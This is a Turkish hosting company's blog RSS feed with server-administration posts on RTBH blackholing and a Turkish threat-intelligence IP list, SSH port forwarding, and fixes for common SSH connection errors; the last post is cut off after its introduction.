<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Sunucu - Cenuta Blog</title>
	<atom:link href="https://www.cenuta.com/blog/sunucu/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.cenuta.com/blog</link>
	<description></description>
	<lastBuildDate>Tue, 20 Jan 2026 14:20:06 +0000</lastBuildDate>
	<language>tr</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.7.5</generator>
	<item>
		<title>Türkiye merkezli açık tehdit istihbaratı yaklaşımı: RTBH.com.tr / list.rtbh.com.tr</title>
		<link>https://www.cenuta.com/blog/turkiye-merkezli-acik-tehdit-istihbarati-yaklasimi-rtbh-com-tr-list-rtbh-com-tr/</link>
		
		<dc:creator><![CDATA[Yiğit S.]]></dc:creator>
		<pubDate>Tue, 20 Jan 2026 14:19:05 +0000</pubDate>
				<category><![CDATA[Sunucu]]></category>
		<guid isPermaLink="false">https://www.cenuta.com/blog/?p=23385</guid>

					<description><![CDATA[<p>Günümüzde DDoS saldırıları, otomatik botnet taramaları ve sürekli exploit denemeleri,<a href="https://www.cenuta.com/blog/turkiye-merkezli-acik-tehdit-istihbarati-yaklasimi-rtbh-com-tr-list-rtbh-com-tr/" data-wpel-link="exclude">...</a></p>
<p><a rel="nofollow" href="https://www.cenuta.com/blog/turkiye-merkezli-acik-tehdit-istihbarati-yaklasimi-rtbh-com-tr-list-rtbh-com-tr/" data-wpel-link="exclude">Türkiye merkezli açık tehdit istihbaratı yaklaşımı: RTBH.com.tr / list.rtbh.com.tr</a> yazısı ilk önce <a rel="nofollow" href="https://www.cenuta.com/blog" data-wpel-link="exclude">Cenuta Blog</a> üzerinde ortaya çıktı.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Günümüzde DDoS saldırıları, otomatik botnet taramaları ve sürekli exploit denemeleri, yalnızca hedef sunucular için değil, tüm ağ altyapısı için ciddi bir tehdit oluşturmaktadır. Bu tehditlere karşı geleneksel güvenlik yaklaşımları çoğu zaman ya geç tepki vermekte ya da ölçeklenebilirlik sorunları yaşamaktadır. <strong>RTBH (Remote Triggered Black Hole)</strong>, bu noktada operatör seviyesinde, BGP tabanlı ve son derece düşük maliyetli bir savunma mekanizması olarak öne çıkmaktadır.</p>



<p>Bu makalede; RTBH kavramı, BGP ile çalışma prensipleri, source-based ve destination-based RTBH yaklaşımları ele alınmakta; ayrıca <a href="https://alptekin.sunnetci.net/" data-type="link" data-id="https://alptekin.sunnetci.net/" data-wpel-link="external" target="_self" rel="nofollow external noopener noreferrer"><strong>Alptekin Sünnetci</strong> </a>tarafından geliştirilen <strong><a href="http://rtbh.com.tr/" data-type="link" data-id="http://rtbh.com.tr/" data-wpel-link="external" target="_self" rel="nofollow external noopener noreferrer">rtbh.com.tr</a> / </strong><a href="http://list.rtbh.com.tr/" data-type="link" data-id="http://list.rtbh.com.tr/" data-wpel-link="external" target="_self" rel="nofollow external noopener noreferrer"><strong>list.rtbh.com.tr</strong> </a>projesi özelinde, <strong>çok sayıda hosting firması, veri merkezi ve isp üzerinde konumlandırılmış dağıtık probeler (distributed hosting probes)</strong> aracılığıyla <strong>sürekli zararlı IP toplama</strong> mimarisi detaylı biçimde incelenmektedir.</p>



<h2 class="wp-block-heading">1. Giriş</h2>



<p>İnternet altyapıları büyüdükçe saldırı yüzeyi de genişlemiştir. Günümüzde saldırılar:</p>



<ul class="wp-block-list">
<li>tek bir hedefe yönelik olmaktan çıkmış,</li>



<li>otomatikleşmiş,</li>



<li>sürekli tarama ve keşif fazları içeren,</li>



<li>düşük maliyetli ama yüksek hacimli</li>
</ul>



<p>bir yapıya evrilmiştir.</p>



<p>Bu ortamda güvenlik artık yalnızca <strong>sunucu seviyesinde</strong> değil, <strong>network ve operatör seviyesinde</strong> ele alınmak zorundadır.</p>



<h2 class="wp-block-heading">2. RTBH (Remote Triggered Black Hole) Nedir?</h2>



<p>RTBH, belirli bir IP adresine veya prefix’e gelen trafiğin, <strong>BGP aracılığıyla özel bir “blackhole” next-hop’una yönlendirilerek ağın en erken noktasında düşürülmesi</strong> tekniğidir.</p>



<p>RTBH’nin temel hedefleri:</p>



<ul class="wp-block-list">
<li>Zararlı trafiği <strong>hedefe ulaşmadan durdurmak</strong></li>



<li>Core, edge ve firewall kaynaklarını korumak</li>



<li>Büyük hacimli saldırılarda <strong>servis sürekliliğini sağlamak</strong></li>
</ul>



<p>RTBH’nin en büyük avantajı:</p>



<ul class="wp-block-list">
<li><strong>State tutmaması</strong></li>



<li><strong>Line-rate çalışması</strong></li>



<li>CPU, RAM veya connection table tüketmemesidir</li>
</ul>



<hr class="wp-block-separator has-alpha-channel-opacity"/>



<h2 class="wp-block-heading">3. Neden Geleneksel Yöntemler Yetersiz Kalır?</h2>



<figure class="wp-block-table"><table class="has-fixed-layout"><thead><tr><th>Yöntem</th><th>Temel Sorun</th></tr></thead><tbody><tr><td>L4 Firewall</td><td>Connection table dolar</td></tr><tr><td>L7 WAF</td><td>Yüksek latency ve CPU</td></tr><tr><td>IDS/IPS</td><td>Ölçeklenemez, false positive</td></tr><tr><td>Host-based firewall</td><td>Trafik zaten sunucuya ulaşmıştır</td></tr></tbody></table></figure>



<p>RTBH, bu sorunları <strong>ağın dışında</strong> çözmeyi hedefler.</p>



<hr class="wp-block-separator has-alpha-channel-opacity"/>



<h2 class="wp-block-heading">4. RTBH Türleri</h2>



<h3 class="wp-block-heading">4.1 Destination-Based RTBH</h3>



<ul class="wp-block-list">
<li>Hedef IP tamamen karartılır</li>



<li>En agresif ama en keskin çözümdür</li>



<li>Servis kesintisi yaratır</li>
</ul>



<h3 class="wp-block-heading">4.2 Source-Based RTBH (S/RTBH)</h3>



<ul class="wp-block-list">
<li>Saldırgan kaynak IP’ler düşürülür</li>



<li>Servis çalışmaya devam eder</li>



<li>Gelişmiş tehdit istihbaratı gerektirir</li>
</ul>



<p><strong>list.rtbh.com.tr</strong>, ağırlıklı olarak <strong>Source-Based RTBH</strong> yaklaşımını mümkün kılan veri üretir.</p>



<hr class="wp-block-separator has-alpha-channel-opacity"/>



<h2 class="wp-block-heading">5. Dağıtık Hosting Probeleri (Distributed Hosting Probes)</h2>



<p>RTBH ekosistemini klasik blacklist projelerinden ayıran en kritik unsur, <strong>çok sayıda hosting firması ve veri merkezi üzerinde konumlandırılmış dağıtık probeler</strong> aracılığıyla <strong>aktif ve sürekli tehdit toplamasıdır</strong>.</p>



<h3 class="wp-block-heading">5.1 Hosting Probes Nedir?</h3>



<p>Hosting probeleri:</p>



<ul class="wp-block-list">
<li>Farklı ASN’lerde</li>



<li>Farklı ülkelerde</li>



<li>Farklı IP bloklarında</li>
</ul>



<p>çalışan, internete açık bırakılmış <strong>kontrollü izleme nodeleridir</strong>.</p>



<p>Amaç:</p>



<ul class="wp-block-list">
<li>Saldırganların <strong>ilk temas ettiği noktalar</strong> olmak</li>



<li>Gerçek müşteri sistemleri hedef olmadan önce saldırgan IP’leri tespit etmek</li>
</ul>



<p>Bu probeler genellikle:</p>



<ul class="wp-block-list">
<li>boş ama routable IP’ler</li>



<li>düşük seviyeli servisler (SSH, HTTP, DNS, SMTP)</li>



<li>honeypot benzeri davranışlar</li>
</ul>



<p>üzerinden saldırgan trafiği üzerine çeker.</p>



<hr class="wp-block-separator has-alpha-channel-opacity"/>



<h2 class="wp-block-heading">6. Sürekli Zararlı IP Toplama (Continuous Threat Harvesting)</h2>



<p>RTBH sisteminde IP listeleri:</p>



<ul class="wp-block-list">
<li>manuel oluşturulmaz</li>



<li>abuse raporlarına dayanmaz</li>



<li>statik olarak güncellenmez</li>
</ul>



<p>Bunun yerine:</p>



<ul class="wp-block-list">
<li><strong>saniyeler–dakikalar ölçeğinde</strong></li>



<li><strong>tamamen otomatik</strong></li>



<li><strong>davranış bazlı</strong></li>
</ul>



<p>olarak üretilir.</p>



<h3 class="wp-block-heading">6.1 Davranış Analizi</h3>



<p>Bir IP şu davranışları sergilediğinde işaretlenir:</p>



<ul class="wp-block-list">
<li>Port scanning</li>



<li>SYN / ACK flood</li>



<li>UDP amplification denemeleri</li>



<li>SSH / RDP brute-force</li>



<li>Web exploit taramaları</li>
</ul>



<p>Tek bir olay yeterli değildir. IP:</p>



<ul class="wp-block-list">
<li>birden fazla probe’da</li>



<li>benzer davranışı</li>



<li>belirli bir zaman penceresinde</li>
</ul>



<p>sergilediğinde <strong>korelasyon skoru</strong> yükselir.</p>



<hr class="wp-block-separator has-alpha-channel-opacity"/>



<h2 class="wp-block-heading">7. Korelasyon ve False Positive Yönetimi</h2>



<p>RTBH mimarisinde:</p>



<ul class="wp-block-list">
<li>tek sensör verisi yeterli kabul edilmez</li>



<li>çoklu doğrulama uygulanır</li>



<li>IP’ler süreli (TTL bazlı) listelenir</li>
</ul>



<p>Bu yaklaşım:</p>



<ul class="wp-block-list">
<li>shared hosting IP’leri</li>



<li>NAT arkasındaki kullanıcılar</li>



<li>CDN node’ları</li>
</ul>



<p>gibi kritik riskleri minimize eder.</p>



<hr class="wp-block-separator has-alpha-channel-opacity"/>



<h2 class="wp-block-heading">8. RTBH Bir Blacklist Değildir</h2>



<p>RTBH listeleri yalnızca “kötü IP” içermez.</p>



<p>Her IP için:</p>



<ul class="wp-block-list">
<li>saldırı tipi</li>



<li>tekrar sayısı</li>



<li>hedef portlar</li>



<li>zaman damgaları</li>
</ul>



<p>gibi bağlamsal veriler tutulur.</p>



<p>Bu sayede RTBH:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>“Bu IP kötüdür”<br>demekten ziyade<br>“Bu IP şu davranışı şu sıklıkta sergiliyor”</p>
</blockquote>



<p>diyebilen bir <strong>davranış havuzu</strong> oluşturur.</p>



<hr class="wp-block-separator has-alpha-channel-opacity"/>



<h2 class="wp-block-heading">9. ISP, Veri Merkezi, Hosting Firmaları İçin Avantajlar</h2>



<p>Dağıtık probe ağı sayesinde:</p>



<ul class="wp-block-list">
<li>müşteri ticket’ı açılmadan önce</li>



<li>saldırı hedefe ulaşmadan önce</li>



<li>upstream’ler etkilenmeden önce</li>
</ul>



<p>zararlı kaynaklar tespit edilir.</p>



<p>Bu yaklaşım:</p>



<ul class="wp-block-list">
<li>reaktif değil, <strong>proaktif</strong></li>



<li>lokal değil, <strong>global</strong></li>



<li>statik değil, <strong>canlı</strong></li>
</ul>



<p>bir güvenlik modeli sunar.</p>



<hr class="wp-block-separator has-alpha-channel-opacity"/>



<h2 class="wp-block-heading">10. RTBH + DDoS Scrubbing Entegrasyonu</h2>



<p>RTBH:</p>



<ul class="wp-block-list">
<li>küçük ve orta ölçekli saldırıları</li>



<li>botnet taramalarını</li>



<li>abuse kaynaklı trafiği</li>
</ul>



<p>erken safhada keser.</p>



<p>Scrubbing çözümleri:</p>



<ul class="wp-block-list">
<li>büyük volumetrik saldırılarda devreye girer.</li>
</ul>



<p>Birlikte kullanıldığında:</p>



<ul class="wp-block-list">
<li>scrubbing merkezine giden trafik azalır</li>



<li>maliyet düşer</li>



<li>latency iyileşir</li>
</ul>



<hr class="wp-block-separator has-alpha-channel-opacity"/>



<h2 class="wp-block-heading">11. Türkiye ve Bölgesel Ekosistem Açısından Önemi</h2>



<p>RTBH.com.tr / list.rtbh.com.tr:</p>



<ul class="wp-block-list">
<li>Türkiye merkezli</li>



<li>açık</li>



<li>operatör dostu</li>
</ul>



<p>nadir RTBH projelerinden biridir.</p>



<p>Bu yapı:</p>



<ul class="wp-block-list">
<li>yerel tehditlerin yerel çözümlerle ele alınmasını</li>



<li>ISP’ler arası iş birliğini</li>



<li>bölgesel bir erken uyarı sistemi oluşmasını</li>
</ul>



<p>mümkün kılar.</p>



<hr class="wp-block-separator has-alpha-channel-opacity"/>



<h2 class="wp-block-heading">12. Sonuç</h2>



<p>RTBH, doğru veriyle beslendiğinde:</p>



<ul class="wp-block-list">
<li>düşük maliyetli</li>



<li>yüksek ölçekli</li>



<li>son derece etkili</li>
</ul>



<p>bir ağ güvenliği mekanizmasıdır.</p>



<p><strong>Dağıtık hosting probeleriyle sürekli zararlı IP toplayan RTBH mimarisi</strong>, bu tekniği teoriden çıkarıp <strong>gerçek dünyada operatör seviyesinde uygulanabilir</strong> hale getirmektedir.</p>



<p>RTBH ile ilgili geliştirmeleri projenin yöneticisi <a href="https://www.linkedin.com/in/alptekinsunnetci/" data-wpel-link="external" target="_self" rel="nofollow external noopener noreferrer">https://www.linkedin.com/in/alptekinsunnetci/</a> hesabından takip edebilirsiniz.</p>



<h3 class="wp-block-heading">Kısa Kapanış</h3>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>RTBH, yalnızca bir “kara delik” değil;<br>dağıtık probelerle beslenen,<br>sürekli öğrenen,<br>operatör seviyesinde bir erken uyarı ve mitigasyon sistemidir.</p>
</blockquote>
<p><a rel="nofollow" href="https://www.cenuta.com/blog/turkiye-merkezli-acik-tehdit-istihbarati-yaklasimi-rtbh-com-tr-list-rtbh-com-tr/" data-wpel-link="exclude">Türkiye merkezli açık tehdit istihbaratı yaklaşımı: RTBH.com.tr / list.rtbh.com.tr</a> yazısı ilk önce <a rel="nofollow" href="https://www.cenuta.com/blog" data-wpel-link="exclude">Cenuta Blog</a> üzerinde ortaya çıktı.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>SSH Tünelleme Nedir? Güvenli Veri Aktarımı İçin Kullanım Senaryoları</title>
		<link>https://www.cenuta.com/blog/ssh-tunelleme-nedir-guvenli-veri-aktarimi-icin-kullanim-senaryolari/</link>
		
		<dc:creator><![CDATA[Ömer Yüksel]]></dc:creator>
		<pubDate>Fri, 23 May 2025 04:48:05 +0000</pubDate>
				<category><![CDATA[Sunucu]]></category>
		<guid isPermaLink="false">https://www.cenuta.com/blog/?p=23340</guid>

					<description><![CDATA[<p>SSH Tünelleme Nedir? SSH (Secure Shell) tünelleme, veri iletişimini şifreleyerek<a href="https://www.cenuta.com/blog/ssh-tunelleme-nedir-guvenli-veri-aktarimi-icin-kullanim-senaryolari/" data-wpel-link="exclude">...</a></p>
<p><a rel="nofollow" href="https://www.cenuta.com/blog/ssh-tunelleme-nedir-guvenli-veri-aktarimi-icin-kullanim-senaryolari/" data-wpel-link="exclude">SSH Tünelleme Nedir? Güvenli Veri Aktarımı İçin Kullanım Senaryoları</a> yazısı ilk önce <a rel="nofollow" href="https://www.cenuta.com/blog" data-wpel-link="exclude">Cenuta Blog</a> üzerinde ortaya çıktı.</p>
]]></description>
										<content:encoded><![CDATA[
<h2 class="wp-block-heading">SSH Tünelleme Nedir?</h2>



<p>SSH (Secure Shell) tünelleme, veri iletişimini şifreleyerek internet üzerinden güvenli bir kanal oluşturmak için kullanılan bir yöntemdir. Genellikle uzak sunucularla güvenli bağlantılar kurmak, trafiği izinsiz erişimden korumak ve belirli portlara erişimi kısıtlamak amacıyla kullanılır.</p>



<p>Bu yöntem, internet üzerindeki trafiğin üçüncü taraflar tarafından izlenmesini veya değiştirilmesini engeller. SSH tünelleme, veri aktarımının sadece şifrelenmiş bağlantı üzerinden gerçekleşmesini sağlayarak gizliliği ve bütünlüğü garanti eder.</p>



<h2 class="wp-block-heading">SSH Tünelleme Nasıl Çalışır?</h2>



<p>SSH tünelleme üç temel yapı üzerinden çalışır:</p>



<h3 class="wp-block-heading">1. <strong>Local Port Forwarding</strong></h3>



<p>Kullanıcının yerel bilgisayarındaki bir port, uzak sunucudaki bir servise yönlendirilir. Örneğin, şirket ağına bağlı bir veritabanına dışarıdan erişmek için kullanılır.</p>



<p><strong>Kullanım Örneği:</strong></p>



<pre class="wp-block-code"><code>ssh -L 3306:localhost:3306 user@remote-server
</code></pre>



<p>Bu komutla, yerel makinenin 3306 portundan gelen trafik, uzak sunucunun aynı portuna iletilir.</p>



<h3 class="wp-block-heading">2. <strong>Remote Port Forwarding</strong></h3>



<p>Uzak bir sunucunun portu, yerel bir bilgisayardaki porta yönlendirilir. Bu, genellikle dış dünyadan yerel sunucuya erişim gerektiğinde kullanılır.</p>



<p><strong>Kullanım Örneği:</strong></p>



<pre class="wp-block-code"><code>ssh -R 8080:localhost:80 user@remote-server
</code></pre>



<h3 class="wp-block-heading">3. <strong>Dynamic Port Forwarding (SOCKS Proxy)</strong></h3>



<p>Bir SOCKS proxy sunucusu oluşturularak internet trafiğinin SSH üzerinden yönlendirilmesini sağlar. VPN alternatifidir.</p>



<p><strong>Kullanım Örneği:</strong></p>



<pre class="wp-block-code"><code>ssh -D 1080 user@remote-server
</code></pre>



<h2 class="wp-block-heading">SSH Tünellemenin Faydaları</h2>



<ul class="wp-block-list">
<li><strong>Veri Güvenliği:</strong> Tüm veri trafiği şifreli bir tünelden geçer.</li>



<li><strong>Uzak Servislere Güvenli Erişim:</strong> Güvenli olmayan ağlarda (örneğin halka açık Wi-Fi) dahi güvenli bağlantı sağlar.</li>



<li><strong>Firewall Atlatma:</strong> Ağ üzerindeki kısıtlamaları aşmak için kullanılır.</li>



<li><strong>VPN Alternatifi:</strong> Düşük kaynakla basit VPN benzeri kullanım senaryoları sunar.</li>
</ul>



<h2 class="wp-block-heading">SSH Tünelleme Nerelerde Kullanılır?</h2>



<h3 class="wp-block-heading">1. <strong>Veritabanı Sunucularına Güvenli Erişim</strong></h3>



<p>Yerel ağda çalışan bir veritabanına doğrudan bağlantı yerine SSH tüneli ile erişim sağlanarak veri güvenliği artırılır.</p>



<h3 class="wp-block-heading">2. <strong>Güvenli Web Arayüzü Erişimi</strong></h3>



<p>Web uygulamaları, yönetim panelleri veya sunucu kontrolleri dış ağlara açılmadan tünel üzerinden erişilebilir.</p>



<h3 class="wp-block-heading">3. <strong>İç Ağ Kaynaklarına Dışarıdan Erişim</strong></h3>



<p>Şirket içinde çalışan bir servise evden veya mobil bağlantı üzerinden güvenli erişim sağlanabilir.</p>



<h3 class="wp-block-heading">4. <strong>VPN Alternatifi Olarak Kullanım</strong></h3>



<p>SSH dynamic port forwarding sayesinde, internet trafiği tünellenerek gizlilik ve güvenlik artırılabilir.</p>



<h3 class="wp-block-heading">5. <strong>Geliştirme ve Test Ortamlarında</strong></h3>



<p>Geliştiriciler, farklı sunucular arasında geçici bağlantılar kurarak test işlemlerini güvenli şekilde gerçekleştirebilir.</p>



<h2 class="wp-block-heading">SSH Tünelleme Yaparken Dikkat Edilmesi Gerekenler</h2>



<ul class="wp-block-list">
<li><strong>Yetkisiz Erişimi Engelleyin:</strong> Sadece güvenilir kullanıcıların SSH bağlantısı kurmasına izin verin.</li>



<li><strong>Güçlü Kimlik Doğrulama Kullanın:</strong> Anahtar tabanlı girişler tercih edilmelidir.</li>



<li><strong>Trafik İzleme:</strong> Gereksiz açık portlar veya tüneller sistem performansını ve güvenliğini etkileyebilir.</li>



<li><strong>Tünel Süresi ve Kapsamı:</strong> Sadece gerekli olduğu sürece tünel açık bırakılmalı ve belirli kaynaklarla sınırlandırılmalıdır.</li>
</ul>



<h2 class="wp-block-heading">Sonuç</h2>



<p>SSH tünelleme, veri güvenliğini artırmak ve uzak sistemlere erişimi kontrol altına almak için güçlü bir çözümdür. Özellikle teknik kullanıcılar, sistem yöneticileri ve geliştiriciler için kritik bir araç olan SSH tünelleme, doğru kullanıldığında ağ trafiğinin şifrelenmesini sağlayarak veri gizliliği ve bütünlüğünü korur.</p>



<p>Doğru yapılandırılmış bir SSH tüneli, hem bireysel hem de kurumsal kullanıcılar için güvenli ve esnek bağlantı çözümleri sunar. Bu teknolojiyi aktif olarak kullanmak, siber tehditlere karşı güçlü bir savunma hattı oluşturmanın önemli bir adımıdır.</p>
<p><a rel="nofollow" href="https://www.cenuta.com/blog/ssh-tunelleme-nedir-guvenli-veri-aktarimi-icin-kullanim-senaryolari/" data-wpel-link="exclude">SSH Tünelleme Nedir? Güvenli Veri Aktarımı İçin Kullanım Senaryoları</a> yazısı ilk önce <a rel="nofollow" href="https://www.cenuta.com/blog" data-wpel-link="exclude">Cenuta Blog</a> üzerinde ortaya çıktı.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>SSH Bağlantı Problemleri Nasıl Çözülür? Hata Kodları ve Çözümleri</title>
		<link>https://www.cenuta.com/blog/ssh-baglanti-problemleri-nasil-cozulur-hata-kodlari-ve-cozumleri/</link>
		
		<dc:creator><![CDATA[Ömer Yüksel]]></dc:creator>
		<pubDate>Wed, 21 May 2025 05:27:08 +0000</pubDate>
				<category><![CDATA[Sunucu]]></category>
		<guid isPermaLink="false">https://www.cenuta.com/blog/?p=23337</guid>

					<description><![CDATA[<p>SSH (Secure Shell), uzak sunuculara güvenli bağlantı kurmak için kullanılan<a href="https://www.cenuta.com/blog/ssh-baglanti-problemleri-nasil-cozulur-hata-kodlari-ve-cozumleri/" data-wpel-link="exclude">...</a></p>
<p><a rel="nofollow" href="https://www.cenuta.com/blog/ssh-baglanti-problemleri-nasil-cozulur-hata-kodlari-ve-cozumleri/" data-wpel-link="exclude">SSH Bağlantı Problemleri Nasıl Çözülür? Hata Kodları ve Çözümleri</a> yazısı ilk önce <a rel="nofollow" href="https://www.cenuta.com/blog" data-wpel-link="exclude">Cenuta Blog</a> üzerinde ortaya çıktı.</p>
]]></description>
										<content:encoded><![CDATA[
<p>SSH (Secure Shell), uzak sunuculara güvenli bağlantı kurmak için kullanılan en yaygın protokollerden biridir. Ancak bazı durumlarda SSH bağlantısı sırasında hatalarla karşılaşılabilir. Bu makalede, SSH bağlantı problemlerinin nedenlerini, yaygın hata kodlarını ve bu sorunların nasıl çözülebileceğini detaylı bir şekilde ele alacağız.</p>



<h2 class="wp-block-heading">SSH Nedir ve Neden Kullanılır?</h2>



<p>SSH, internet üzerinden şifreli iletişim kurmak için kullanılan bir protokoldür. Genellikle sistem yöneticileri tarafından sunuculara erişim, dosya transferi veya uzak komut çalıştırma amacıyla tercih edilir. SSH bağlantısı, kimlik doğrulama ve veri şifreleme açısından oldukça güvenlidir.</p>



<h2 class="wp-block-heading">SSH Bağlantı Problemlerinin Genel Nedenleri</h2>



<p>SSH bağlantısında karşılaşılan problemler birçok farklı faktöre bağlı olabilir:</p>



<ul class="wp-block-list">
<li>Yanlış IP adresi veya hostname kullanımı</li>



<li>SSH servisi çalışmıyor olabilir</li>



<li>Güvenlik duvarı bağlantıyı engelliyor olabilir</li>



<li>SSH portu değiştirilmiş olabilir</li>



<li>Anahtar tabanlı kimlik doğrulamada hatalı yapılandırma</li>



<li>DNS çözümleme sorunları</li>
</ul>



<h2 class="wp-block-heading">Yaygın SSH Hataları ve Çözüm Yolları</h2>



<h3 class="wp-block-heading">1. <strong>Connection Refused (Bağlantı Reddedildi)</strong></h3>



<p><strong>Nedenleri:</strong></p>



<ul class="wp-block-list">
<li>SSH servisi çalışmıyor olabilir</li>



<li>Yanlış IP adresi veya port</li>
</ul>



<p><strong>Çözüm:</strong></p>



<ul class="wp-block-list">
<li>SSH servisini kontrol edin: <code>sudo systemctl status ssh</code></li>



<li>Varsayılan portun (22) kullanıldığından emin olun veya özel port numarasını belirtin: <code>ssh -p 2222 kullanıcı@sunucu_adresi</code></li>
</ul>



<h3 class="wp-block-heading">2. <strong>Connection Timed Out (Bağlantı Zaman Aşımına Uğradı)</strong></h3>



<p><strong>Nedenleri:</strong></p>



<ul class="wp-block-list">
<li>Sunucuya bağlantı kurulamadı</li>



<li>Güvenlik duvarı veya ağ erişimi engellenmiş olabilir</li>
</ul>



<p><strong>Çözüm:</strong></p>



<ul class="wp-block-list">
<li>Sunucu açık ve internete bağlı mı kontrol edin</li>



<li>Sunucu tarafında SSH portuna izin verildiğinden emin olun: <code>sudo ufw allow ssh</code></li>
</ul>



<h3 class="wp-block-heading">3. <strong>Permission Denied (İzin Reddedildi)</strong></h3>



<p><strong>Nedenleri:</strong></p>



<ul class="wp-block-list">
<li>Yanlış kullanıcı adı veya parola</li>



<li>Hatalı SSH anahtar dosyası</li>
</ul>



<p><strong>Çözüm:</strong></p>



<ul class="wp-block-list">
<li>Doğru kullanıcı adını kullandığınızdan emin olun</li>



<li>Giriş için doğru özel anahtar dosyasını kullanın: <code>ssh -i ~/.ssh/id_rsa kullanıcı@sunucu_adresi</code></li>
</ul>



<h3 class="wp-block-heading">4. <strong>No Route to Host</strong></h3>



<p><strong>Nedenleri:</strong></p>



<ul class="wp-block-list">
<li>Ağ yapılandırma hatası</li>



<li>Sunucuya erişim yok</li>
</ul>



<p><strong>Çözüm:</strong></p>



<ul class="wp-block-list">
<li>IP adresini kontrol edin</li>



<li>Ağ kablosu, VPN bağlantısı veya sunucu güvenlik grubu ayarlarını kontrol edin</li>
</ul>



<h3 class="wp-block-heading">5. <strong>Host Key Verification Failed</strong></h3>



<p><strong>Nedenleri:</strong></p>



<ul class="wp-block-list">
<li>Sunucunun parmak izi değişmiş olabilir</li>



<li>DNS spoofing veya MITM (ortadaki adam) saldırısı olabilir</li>
</ul>



<p><strong>Çözüm:</strong></p>



<ul class="wp-block-list">
<li><code>known_hosts</code> dosyasındaki eski anahtar kaydını silin: <code>ssh-keygen -R sunucu_adresi</code></li>
</ul>



<h2 class="wp-block-heading">SSH Bağlantısı Kurulamıyorsa Ne Yapılmalı?</h2>



<ol class="wp-block-list">
<li><strong>SSH Servisinin Aktif Olduğundan Emin Olun</strong> <code>sudo systemctl restart ssh</code></li>



<li><strong>Güvenlik Duvarı Ayarlarını Kontrol Edin</strong> <code>sudo ufw status sudo iptables -L</code></li>



<li><strong>SSH Portunu Doğru Kullandığınızdan Emin Olun</strong>
<ul class="wp-block-list">
<li>Varsayılan dışındaki portlar için: <code>ssh -p 2200 kullanıcı@sunucu</code></li>
</ul>
</li>



<li><strong>Anahtar Yetkilendirmelerini Kontrol Edin</strong>
<ul class="wp-block-list">
<li><code>.ssh/authorized_keys</code> dosyasının izinleri: <code>chmod 600 authorized_keys chmod 700 ~/.ssh</code></li>
</ul>
</li>
</ol>



<h2 class="wp-block-heading">SSH Bağlantı Sorunları İçin İpuçları</h2>



<ul class="wp-block-list">
<li><strong>Verbose modunu kullanın</strong>: <code>ssh -v kullanıcı@sunucu</code> Bu komut, bağlantı sürecini ayrıntılı gösterir ve hata tespiti için oldukça yararlıdır.</li>



<li><strong>DNS Problemlerinden Kaçının</strong>:<br>IP adresi ile bağlanarak DNS kaynaklı sorunları ortadan kaldırabilirsiniz.</li>



<li><strong>Anahtar Tabanlı Kimlik Doğrulama Kullanın</strong>:<br>Şifre yerine anahtar tabanlı bağlantı hem daha güvenli hem de daha hızlıdır.</li>
</ul>



<h2 class="wp-block-heading">Sonuç</h2>



<p>SSH bağlantı problemleri çoğu zaman doğru yapılandırma ve temel kontrollerle çözülebilir. Yaygın hataları tanımak ve sistematik bir şekilde çözüm üretmek, bağlantı sürekliliği açısından kritik öneme sahiptir. Sunucu erişim sorunları yaşadığınızda yukarıdaki adımları uygulayarak sorunları hızla tespit edebilir ve çözebilirsiniz.</p>
<p><a rel="nofollow" href="https://www.cenuta.com/blog/ssh-baglanti-problemleri-nasil-cozulur-hata-kodlari-ve-cozumleri/" data-wpel-link="exclude">SSH Bağlantı Problemleri Nasıl Çözülür? Hata Kodları ve Çözümleri</a> yazısı ilk önce <a rel="nofollow" href="https://www.cenuta.com/blog" data-wpel-link="exclude">Cenuta Blog</a> üzerinde ortaya çıktı.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Sunucu İzleme Araçları Nelerdir? Gerçek Zamanlı Performans ve Güvenlik Takibi</title>
		<link>https://www.cenuta.com/blog/sunucu-izleme-araclari-nelerdir-gercek-zamanli-performans-ve-guvenlik-takibi/</link>
		
		<dc:creator><![CDATA[Ömer Yüksel]]></dc:creator>
		<pubDate>Mon, 19 May 2025 05:24:59 +0000</pubDate>
				<category><![CDATA[Sunucu]]></category>
		<guid isPermaLink="false">https://www.cenuta.com/blog/?p=23330</guid>

					<description><![CDATA[<p>Sunucu altyapısının stabil, hızlı ve güvenli çalışabilmesi için gerçek zamanlı<a href="https://www.cenuta.com/blog/sunucu-izleme-araclari-nelerdir-gercek-zamanli-performans-ve-guvenlik-takibi/" data-wpel-link="exclude">...</a></p>
<p><a rel="nofollow" href="https://www.cenuta.com/blog/sunucu-izleme-araclari-nelerdir-gercek-zamanli-performans-ve-guvenlik-takibi/" data-wpel-link="exclude">Sunucu İzleme Araçları Nelerdir? Gerçek Zamanlı Performans ve Güvenlik Takibi</a> yazısı ilk önce <a rel="nofollow" href="https://www.cenuta.com/blog" data-wpel-link="exclude">Cenuta Blog</a> üzerinde ortaya çıktı.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Sunucu altyapısının stabil, hızlı ve güvenli çalışabilmesi için <strong>gerçek zamanlı izleme ve analiz</strong> büyük önem taşır. Özellikle web hizmeti sunan işletmeler, performans düşüklüğü veya güvenlik açıkları gibi sorunları erken tespit etmek zorundadır. Bu noktada devreye giren <strong>sunucu izleme araçları</strong>, sistem yöneticilerine anlık bilgi sağlayarak aksiyon alınmasını mümkün kılar.</p>



<p>Bu makalede sunucu izleme araçlarının ne işe yaradığı, hangi metriklerin takip edildiği ve en çok tercih edilen izleme yazılımlarının neler olduğu detaylı şekilde ele alınmaktadır.</p>



<h2 class="wp-block-heading">Sunucu İzleme Nedir ve Neden Gereklidir?</h2>



